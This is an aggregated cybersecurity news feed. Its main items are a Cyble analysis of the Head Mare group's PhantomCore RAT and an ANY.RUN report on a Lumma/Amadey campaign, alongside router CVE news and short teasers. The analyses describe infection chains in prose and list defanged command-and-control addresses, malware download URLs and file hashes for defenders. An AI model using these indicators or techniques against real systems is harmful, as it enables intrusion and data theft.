Tel Aviv company building software to secure non-human identities banks a $45 million funding round led by Menlo Ventures.
The post Astrix Security Banks $45M Series B to Secure Non-Human Identities appeared first on SecurityWeek.
SecurityWeek – Read More
The TP-Link Archer C50 V4, a popular dual-band wireless router designed for small office and home office (SOHO) networks, has been found to contain multiple security vulnerabilities that could expose users to a range of cyber threats.
These TP-Link Archer router vulnerabilities, identified under the CVE-2024-54126 and CVE-2024-54127 identifiers, affect all firmware versions prior to Archer C50(EU)_V4_240917. The Indian Computer Emergency Response Team (CERT-In) flagged these vulnerabilities and the security of TP-Link Archer routers.
The vulnerabilities identified in the TP-Link Archer C50 V4 wireless router could allow attackers to exploit critical security holes in the device, leading to unauthorized access and potentially damaging consequences. Two specific issues have been highlighted: a flaw in the firmware upgrade process and the exposure of sensitive Wi-Fi credentials.
The TP-Link Archer router vulnerabilities have been classified as medium risk. While the immediate impact may not be critical, the potential for exploitation remains a threat to network security. CVE-2024-54126 and CVE-2024-54127 were reported by Khalid Markar, Amey Chavekar, Sushant Mane, and Dr. Faruk Kazi from CoE-CNDS Lab, VJTI, Mumbai.
One of the key vulnerabilities in the TP-Link Archer C50 router arises from an improper signature verification mechanism in the firmware upgrade process. This issue is present in the web interface of the router, which could be exploited by an attacker with administrative privileges. If the attacker is within the Wi-Fi range of the router, they could upload and execute malicious firmware, allowing them to compromise the device completely.
The absence of adequate integrity checks during firmware updates could enable an attacker to introduce backdoors or malicious code into the router. This would allow the attacker to control the device, manipulate network traffic, or even hijack the entire system, posing a serious security risk for users relying on this router for their home or business networks.
The second vulnerability is related to the lack of proper access control on the serial interface of the TP-Link Archer C50 router. An attacker with physical access to the device could exploit this weakness by accessing the Universal Asynchronous Receiver-Transmitter (UART) shell. Once inside, the attacker could easily extract Wi-Fi credentials, including the network name (SSID) and password, which would give them unauthorized access to the targeted network.
This vulnerability in TP-Link Archer routers is particularly malicious because obtaining Wi-Fi credentials allows attackers to infiltrate the network, potentially exposing sensitive data, intercepting communications, or launching further attacks on connected devices. The ability to obtain such information without the need for remote access makes this vulnerability especially dangerous in situations where physical access to the device is possible.
The presence of these vulnerabilities in the TP-Link Archer C50 V4 router could lead to significant security risks, including:
Given that many home and small office networks rely on TP-Link Archer routers for wireless connectivity, these vulnerabilities have the potential to affect a large number of users. The impact could be particularly severe for businesses or individuals who store sensitive information or rely on secure communications.
To mitigate the risks associated with these vulnerabilities, TP-Link has released a firmware update designed to address the issues. The solution is available for download through the official TP-Link website and should be applied as soon as possible to protect the router from potential attacks. Some of the recommended actions include:
The discovery of vulnerabilities in the TP-Link Archer router highlights the critical need for users to stay updated with the latest firmware releases and security patches. The vulnerabilities in the TP-Link Archer C50 V4, including the insufficient integrity verification during firmware upgrades and the exposure of Wi-Fi credentials, present an ongoing security risks that could lead to unauthorized access and system compromise.
By upgrading to the latest firmware version, users can mitigate the risks associated with these vulnerabilities and protect their networks from potential exploitation. TP-Link Archer router users should take immediate action to secure their devices and ensure their networks remain safe from attackers seeking to exploit these flaws.
The post Security Risks in TP-Link Archer Router Could Lead to Unauthorized Access appeared first on Cyble.
Blog – Cyble – Read More
On 2nd September 2024, Kaspersky released a blog about the Head Mare group, which first emerged in 2023. Head Mare is a hacktivist group targeting organizations in Russia and Belarus with the goal of causing maximum damage rather than financial gain. They use up-to-date tactics, such as exploiting the CVE-2023-38831 vulnerability in WinRAR, to gain initial access and deliver malicious payloads. The group maintains a public presence on X, where they disclose information about their victims.
Their targets span various industries, including government, transportation, energy, manufacturing, and entertainment. Unlike other groups, Head Mare also demands ransom for data decryption.
CRIL recently identified a campaign targeting Russians linked to the notorious Head Mare group. While the initial infection vector remains unknown, the group typically reaches users via spam emails. In this campaign, a ZIP archive named “Doc.Zip” was discovered, containing a malicious LNK file, an executable disguised as “Doc.zip” identified as the PhantomCore RAT, and a corrupted PDF.
Upon executing the LNK file, it extracts the “Doc.Zip” archive into the “C:ProgramData” directory and executes the file “Doc.zip” using cmd.exe. Once executed, the malware gathers the victim’s information, such as the public IP address, windows version username, etc., and sends it to a command-and-control (C&C) server controlled by the TA. It then awaits further commands from the C&C server to execute additional malicious activities. The figure below shows the infection chain.
Earlier, PhantomCore samples were developed using GoLang. However, in the latest campaign, the threat actor is using C++-compiled PhantomCore binaries. Additionally, the C++ version of PhantomCore incorporates the Boost.Beast library, which facilitates communication between the infected system and the command-and-control (C&C) server through HTTP WebSockets.
The ZIP archive “Doc.zip,” downloaded from the file-sharing website hxxps://filetransfer[.]io/data-package/AiveGg6u/download, is suspected to have been delivered to the victim via a spam email. The email likely carried a social engineering theme, designed to appear legitimate, such as an invoice for goods or similar financial documents. This theme was intended to deceive the recipient into interacting with the malicious attachment, ultimately leading to the delivery of the malicious payload.
The zip archive contains multiple files, including two LNK files, a corrupted lure PDF file, and an executable camouflaged as a “.zip” file extension. All the files within the archive are notably in Russian, as detailed in the table below.
| Actual file names | Translated names |
| Список товаров и услуг.pdf.lnk | List of goods and services.pdf.lnk |
| Счет-фактура.pdf.lnk | Invoice.pdf.lnk |
| Контактные данные для оплаты.pdf | Contact details for payment.pdf |
| Doc.zip | Doc.zip |
The LNK file is configured to execute a PowerShell command that locates and extracts the “Doc.zip” archive into the “C:ProgramData” directory. Once extracted, the “Doc.zip” archive, which contains an executable, is launched using the cmd.exe start command. The figure below illustrates the contents of the LNK file.
Upon execution, the Doc.zip file sets both the input and output code pages to OEM Russian (Cyrillic) using the SetConsoleCP and SetConsoleOutputCP Win32 APIs. Additionally, it sets the locale language of the victim machine to “ru_RU.UTF-8” to configure the system to use the Russian locale with UTF-8 encoding.
After configuring the locale settings, the malware attempts to connect to the C&C server at 45.10.247.152 using the User-Agent string “Boost.Beast/353”. It retries the connection until successful, sleeping for 10 seconds between each attempt.
After a successful connection is established, the malware gathers the victim’s information, including the Buildname, Windows version, public IP address, computer name, username, and domain details. The Buildname, which can vary (e.g., ZIP, URL), may indicate the infection vector. This collected data is then sent to the C&C server via the “init” endpoint, as illustrated in the figure below.
After sending the initial request containing the victim details and UUID, the malware waits for a response from the TA. However, during our analysis, we were unable to capture the response. Nevertheless, code analysis indicates that the typical response from the TA follows a format similar to the one shown below.
Moreover, the TA can execute commands on the victim’s machine and download additional payloads from the C&C server. This enables them to escalate the compromise, conduct further malicious activities, or expand the attack by deploying specific commands and payloads. The RAT uses the following endpoints for its C&C communication and to receive commands
The TA uses the following methods to execute commands and deploy additional payloads.
Command Execution through Pipes
The execution process involves creating a pipe and redirecting the WritePipe handle to the standard output (stdout) and standard error (stderr). A new process is then launched using the command “cmd.exe /c” to execute the specified command. After the command is executed, the output is retrieved by reading from the pipe using the “ReadFile” API and the ReadPipe handle. Additionally, a log is generated to monitor and track the success or failure of the pipe creation and command execution.
The following code demonstrates the TAs ability to execute commands through a pipe, read the command output, and parse the commands for execution via the pipe.
Creating new process
The malware can also create a new process based on the input from the calling function. If successful, it closes the process and thread handles, updates the log with a success message, and sets a flag to notify the calling process. In case of failure, it logs an error message and sets a different flag to indicate the failure.
The Head Mare group has been known to deploy ransomware in previous attacks, targeting a variety of systems and environments. This includes the use of widely recognized ransomware strains such as LockBit for Windows machines and Babuk for ESXi (VMware) environments. These ransomware strains are notorious for their ability to encrypt valuable data and demand ransom payments from victims in exchange for decryption keys.
Yara and Sigma rules to detect this campaign are available for download from the linked Github repository.
The Head Mare group’s campaign continues to target Russian organizations using the PhantomCore RAT and evolving tactics, including using C++-compiled binaries and social engineering techniques. The group’s ability to collect victim data and deploy additional payloads, including ransomware, highlights the ongoing threat it poses. Organizations must stay vigilant and strengthen their security measures to defend against such attacks.
| Tactic | Technique | Procedure |
| Initial Access (TA0001) | Phishing (T1566) | ZIP archives might be sent through phishing email to the target users |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | Powershell is used to extract the archive file |
| Execution (TA0002) | Windows Command Shell (T1059.003) | Cmd.exe is used to execute commands through PIPE, start command |
| Execution (TA0002) | Native API (T1106) | SetConsoleCP, SetConsoleOutputCP, and other Win32 APIs to configure locale |
| Command and Control (TA0011) | System Information Discovery (T1082) | Collects victim details, including OS version, computer name, username, and domain details |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Communicates with the C&C server over HTTP using the “Boost.Beast” library. |
| Indicator | Indicator type | Comments |
| 6ac2d57d066ef791b906c3b4c6b5e5c54081d6657af459115eb6abb1a9d1085d | SHA-256 | coYLaSU4TQum |
| 0f578e437f5c09fb81059f4b5e6ee0b93cfc0cdf8b31a29abc8396b6137d10c3 | SHA-256 | Список товаров и услуг.pdf.lnk |
| dd49fd0e614ac3f6f89bae7b7a6aa9cdab3b338d2a8d11a11a774ecc9d287d6f | SHA-256 | Счет-фактура.pdf.lnk |
| 57848d222cfbf05309d7684123128f9a2bffd173f48aa3217590f79612f4c773 | SHA-256 | Doc.zip |
| 4b62da75898d1f685b675e7cbaec24472eb7162474d2fd66f3678fb86322ef0a | SHA-256 | Phantomcore RAT |
| 44b1f97e1bbdd56afeb1efd477aa4e0ecaa79645032e44c7783f997f377d749f | SHA-256 | Phantomcore RAT |
| 2dccb526de9a17a07e39bdedc54fbd66288277f05fb45c7cba56f88df00e86a7 | SHA-256 | Phantomcore RAT |
| 1a2d1654d8ff10f200c47015d96d2fcb1d4d40ee027beb55bb46199c11b810cc | SHA-256 | Phantomcore RAT |
| 8aad7f80f0120d1455320489ff1f807222c02c8703bd46250dd7c3868164ab70 | SHA-256 | Phantomcore RAT |
| 9df6afb2afbd903289f3b4794be4768214c223a3024a90f954ae6d2bb093bea3 | SHA-256 | Phantomcore RAT |
| hxxps://city-tuning[.]ru/collection/srvhost.exe | URL | Phantomcore RAT Download URL |
| hxxps://filetransfer[.]io/data-package/AiveGg6u/download | URL | ZIP file download URL |
| hxxp://45.10.247[.]152/init | URL | C&C |
| hxxp://45.10.247[.]152/check | URL | C&C |
| hxxp://45.10.247[.]152/connect | URL | C&C |
| hxxp://45.10.247[.]152/command | URL | C&C |
| hxxp://185.80.91[.]84/command | URL | C&C |
| hxxp://185.80.91[.]84/connect | URL | C&C |
| hxxp://185.80.91[.]84/check | URL | C&C |
| hxxp://185.80.91[.]84/init | URL | C&C |
| hxxp://45.87.245[.]53/init | URL | C&C |
| hxxp://45.87.245[.]53/check | URL | C&C |
| hxxp://45.87.245[.]53/connect | URL | C&C |
| hxxp://45.87.245[.]53/command | URL | C&C |
The post Head Mare Group Intensifies Attacks on Russia with PhantomCore RAT appeared first on Cyble.
Blog – Cyble – Read More
Threat actors are exploiting a high-risk bug in Cleo software – and Huntress warns that fully-patched systems are vulnerable
© 2024 TechCrunch. All rights reserved. For personal use only.
Security News | TechCrunch – Read More
Microsoft has rolled out new default security protections that mitigate NTLM relaying attacks across on-premises Exchange, AD CS, and LDAP services.
The post Microsoft Rolls Out Default NTLM Relay Attack Mitigations appeared first on SecurityWeek.
SecurityWeek – Read More
The manufacturing industry has long been a target of cybercriminals. While data encryption has been a prevalent tactic in recent years, threat actors are now increasingly focusing on stealing sensitive information and gaining control over critical infrastructure.
One of the latest campaigns on record involves the use of Lumma and Amadey malware.
This campaign heavily leverages Living Off the Land (LOLBAS) techniques to deliver malware as part of its operations.
Threat actors distribute phishing emails with URLs leading targets to download LNK files disguised as PDFs. These files are accessed via a domain name masquerading as one belonging to LogicalDOC, a service for managing documentation widely utilized in the manufacturing industry.
The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded from berb[.]fitnessclub-filmfanatics[.]com as a ZIP archive.
The malware utilizes both PowerShell and Windows Management Instrumentation (WMI) commands to collect detailed information about the victim’s system. This includes:
This reconnaissance allows attackers to tailor subsequent attacks and enhances their credibility when sending follow-up malicious emails within the targeted organization.
Attackers run malicious code in memory without leaving traces and abuse standard Windows tools to blend in with regular system activities. The downloaded ZIP file contains several malicious files used to carry out DLL sideloading.
The primary purpose of this attack is to:
Aattackers gain the ability to continuously monitor and manipulate their targets, which poses a significant threat to manufacturing businesses.
For manufacturing companies, the consequences of such attacks can be severe and include:
Understanding and preparing for these threats is crucial for protecting valuable assets, maintaining operational integrity, and ensuring the safety of employees and customers.
To proactively identify malicious files belonging to this and other malware attacks, analyze them in the safe environment of ANY.RUN’s Interactive Sandbox that offers:
By uploading a malicious LNK file to the sandbox and executing it we can observe how the entire chain of infection plays out.
First, the .lnk file initiates SSH, which starts PowerShell.
PowerShell then launches Mshta with the AES-encrypted first-stage payload that it decrypts and executes.
PowerShell executes an AES-encrypted command to decrypt and run Emmenhtal.
Emmental leads to system infections with Lumma and Amadey as a result.
With TI Lookup, ANY.RUN’s searchable database of the latest threat intelligence, you can find more info on malware and phishing campaigns. TI Lookup provides:
Use the following query, consisting of the name of the threat and the path to one of the malicious files used in the attack, for your search:
The service provides a list of files matching the query along with sandbox sessions featuring analysis of samples belonging to the same campaign that you can explore in detail.
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
The post Manufacturing Companies Targeted with New Lumma and Amadey Campaign appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Cyber attackers never stop inventing new ways to compromise their targets. That’s why organizations must stay updated on the latest threats.
Here’s a quick rundown of the current malware and phishing attacks you need to know about to safeguard your infrastructure before they reach you.
Zero-day Attack: Corrupted Malicious Files Evade Detection by Most Security Systems
The analyst
The Hacker News – Read More
A Chinese threat actor infiltrated several IT and security companies in a bring-your-own VS code, with an eye to carrying out a supply-chain-based espionage attack.
darkreading – Read More
Radiant Capital says a North Korean threat actor stole $50 million in assets in a sophisticated October attack.
The post $50 Million Radiant Capital Heist Blamed on North Korean Hackers appeared first on SecurityWeek.
SecurityWeek – Read More
Summary Cybersecurity researchers have identified a large-scale hacking operation linked to notorious ShinyHunters and Nemesis hacking groups. In…
Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – Read More